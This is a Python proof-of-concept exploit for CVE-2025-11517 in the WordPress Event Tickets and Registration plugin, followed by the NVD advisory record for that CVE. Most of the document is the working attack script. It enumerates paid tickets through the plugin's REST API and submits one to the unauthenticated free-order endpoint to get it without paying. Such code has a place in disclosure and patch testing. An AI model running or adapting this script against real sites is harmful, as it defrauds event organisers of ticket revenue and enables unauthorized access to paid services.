CVE-2025-11517

import requests import json # Target WordPress site with Event Tickets and Registration plugin target_url = "https://target-wordpress-site.com" free_order_endpoint = f"{target_url}/wp-json/tribe/tickets/v1/commerce/free/order" # First, discover available ticket IDs by querying the tickets REST API tickets_endpoint = f"{target_url}/wp-json/tribe/tickets/v1/tickets" def discover_paid_tickets(): """Discover available ticket types and their IDs from the target site""" try: response = requests.get(tickets_endpoint, timeout=10) if response.status_code == 200: tickets = response.json() # Filter for paid tickets (price > 0) paid_tickets = [t for t in tickets if t.get('price', 0) > 0] return paid_tickets return [] except Exception as e: print(f"Error discovering tickets: {e}") return [] def exploit_payment_bypass(ticket_id, quantity=1): """ Exploit CVE-2025-11517: Payment bypass via free order endpoint Submit a paid ticket ID to the free order endpoint to bypass payment """ # Construct the order payload with a paid ticket ID order_data = { "tickets": { str(ticket_id): quantity }, "attendees": [ { "ticket_id": ticket_id, "title": "Mr", "first_name": "Test", "last_name": "User", "email": "[email protected]" } ] } headers = { "Content-Type": "application/json", "X-WP-Nonce": "", # No nonce needed - endpoint doesn't require auth "User-Agent": "Mozilla/5.0" } try: response = requests.post( free_order_endpoint, data=json.dumps(order_data), headers=headers, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") return response except Exception as e: print(f"Error exploiting: {e}") return None if __name__ == "__main__": # Step 1: Discover paid tickets paid_tickets = discover_paid_tickets() if paid_tickets: # Step 2: Exploit the first paid ticket found target_ticket = paid_tickets[0] ticket_id = target_ticket.get('id') print(f"Targeting paid ticket ID: {ticket_id}") exploit_payment_bypass(ticket_id) else: print("No paid tickets found or unable to enumerate tickets")

{"cve": {"id": "CVE-2025-11517", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Event Tickets and Registration plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 5.26.5. This is due to the /wp-json/tribe/tickets/v1/commerce/free/order endpoint not verifying that a ticket type should be free allowing the user to bypass the payment. This makes it possible for unauthenticated attackers to obtain access to paid tickets, without paying for them, causing a loss of revenue for the target."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3378214/event-tickets/tags/5.26.6/src/Tickets/Commerce/Gateways/Free/REST/Order_Endpoint.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21cd8cb8-2a29-4b66-ab7a-8d8b2f85e2e0?source=cve", "source": "[email protected]"}]}}